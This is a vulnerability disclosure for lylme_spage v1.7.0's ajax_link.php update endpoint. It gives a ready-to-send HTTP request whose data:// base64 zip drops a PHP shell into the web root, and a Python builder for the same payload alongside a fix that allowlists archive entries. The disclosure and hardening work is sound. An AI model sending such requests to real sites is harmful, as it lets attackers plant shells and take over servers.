Upload Shell Vulnerability in ajax_link.php

Although this is a back-end (authenticated) vulnerability, it can be chained with #32 into a pre-auth shell upload.

1. Steps to reproduce
1. Send a POST request to http://host/admin/ajax_link.php?submit=update carrying the data below. The injection point is the file field in the HTTP body: its value is not a path on the server but a data:// stream wrapper whose base64 payload is a zip archive containing 1.php (the sample below is exactly 198 bytes, matching the Content-Length).
POST /lylme_spage-master/admin/ajax_link.php?submit=update HTTP/1.1
Host: host
Connection: close
Cookie: admin_token=ec2a3HYAaqQws10zQfeSJaDeJN1aI2gOnV9BLpaHNYdb2hHPQ9nYkoMzuOuQIokfoyJRVcVNK3aT8JUZXq5WSPqTBQ;
Content-Type: application/x-www-form-urlencoded
Content-Length: 198
file=data://text/plain;base64,UEsDBBQAAAAIALMUSFdQg8x9EgAAABIAAAAFAAAAMS5waHCzsS/IKFAA4sy8tHwNTWt7OwBQSwECFAMUAAAACACzFEhXUIPMfRIAAAASAAAABQAAAAAAAAAAAAAAgAEAAAAAMS5waHBQSwUGAAAAAAEAAQAzAAAANQAAAAAA
2. After the request is submitted, the shell 1.php is extracted into the ROOT dir.
2. Expected behaviour
The code is meant to update the system from a zip package.
3. Actual behaviour
However, a deeper audit of the code shows that $RemoteFile, which is fetched from the user-supplied file parameter, can carry arbitrary malicious data; it is handed straight to the zipExtract function, which releases its contents into the ROOT dir with no check on what the archive contains.
4. Affected Version
This vuln affects the latest version: lylme_spage v1.7.0
5. Fix Recommendations
To fix this vuln, my advice is:
1. Remove this function entry point entirely, or
2. Restrict the file suffixes allowed in the update archive: inspect every entry before extraction and refuse the whole package if any entry has a suffix outside a fixed allowlist, so that no .php (or other server-executable) file can ever be written into the web root.
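As an added example (not code from lylme_spage), the following Python builds the same kind of payload as the request in step 1 above, so the data:// wrapper trick can be reproduced with a harmless archive, and implements fix recommendation 2 as an allowlist check over the archive's entries that a hardened updater would run before extracting anything. The host, the admin_token value, the default request path and the archive contents are constructed placeholders; the project's own $RemoteFile/zipExtract handling is not reproduced here.

```python
"""PoC builder plus zip-entry allowlist for the ajax_link.php?submit=update issue.

Added example; not code from the lylme_spage project. Everything below
(host, cookie, archive contents) is constructed for illustration.
"""
import base64
import io
import posixpath
import zipfile
from urllib.parse import quote

# Constructed payload: a single-file archive holding a PHP file. A harmless
# marker stands in for a real shell; the technique is identical.
SHELL_NAME = "1.php"
SHELL_BODY = b"<?php echo 'marker'; ?>"


def build_zip(entries):
    """Return the bytes of a zip archive holding the given name -> content map."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def data_uri(zip_bytes):
    """Wrap the archive as the data:// value the `file` field abuses.

    PHP's stream functions (file_get_contents() and friends) accept the
    data:// wrapper when allow_url_fopen is on (the default), so the server
    'downloads' attacker-controlled bytes without any outbound connection.
    """
    return "data://text/plain;base64," + base64.b64encode(zip_bytes).decode()


def parse_data_uri(value):
    """Reverse of data_uri(): the bytes the server ends up handing to the extractor."""
    prefix = "data://text/plain;base64,"
    if not value.startswith(prefix):
        raise ValueError("not a base64 data:// URI")
    return base64.b64decode(value[len(prefix):])


def build_request(host, cookie, zip_bytes, path="/admin/ajax_link.php?submit=update"):
    """Assemble the raw HTTP/1.1 request from the report (path assumes no deployment prefix)."""
    # The value is percent-encoded here; the report sends it raw, which only
    # works because its base64 happens to contain no '+' (decoded as a space).
    body = "file=" + quote(data_uri(zip_bytes), safe="")
    headers = [
        "POST %s HTTP/1.1" % path,
        "Host: %s" % host,
        "Connection: close",
        "Cookie: admin_token=%s;" % cookie,
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: %d" % len(body),
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


# --- Fix recommendation 2: restrict what an update archive may contain ------
# Assumed allowlist for a static-page project; adjust to the real update format.
ALLOWED_SUFFIXES = {".html", ".css", ".js", ".png", ".jpg", ".svg", ".txt"}


def unsafe_entries(zip_bytes, allowed=ALLOWED_SUFFIXES):
    """Return archive member names a hardened updater must refuse to extract.

    Rejects (a) any suffix outside the allowlist, so .php/.phtml/.htaccess can
    never land in the web root, and (b) names that escape the target directory
    through absolute paths or '..' segments (zip-slip), which a suffix check
    alone would miss.
    """
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            norm = posixpath.normpath(name)
            if norm.startswith("/") or ".." in norm.split("/"):
                bad.append(name)
                continue
            if name.endswith("/"):  # directory entry: nothing is written for it
                continue
            ext = posixpath.splitext(norm)[1].lower()
            if ext not in allowed:
                bad.append(name)
    return bad


def safe_to_extract(zip_bytes):
    """True only if every entry passes; reject the whole package otherwise."""
    return not unsafe_entries(zip_bytes)


if __name__ == "__main__":
    payload = build_zip({SHELL_NAME: SHELL_BODY})
    print(build_request("host", "ADMIN_TOKEN_PLACEHOLDER", payload))
    print("rejected entries:", unsafe_entries(payload))
```

The allowlist check is only half of the fix: the `file` value itself should also be validated (reject stream wrappers such as data:// and php://, accept only the update source the application actually expects) and the archive should be unpacked into a temporary directory and checked before anything is moved into the web root.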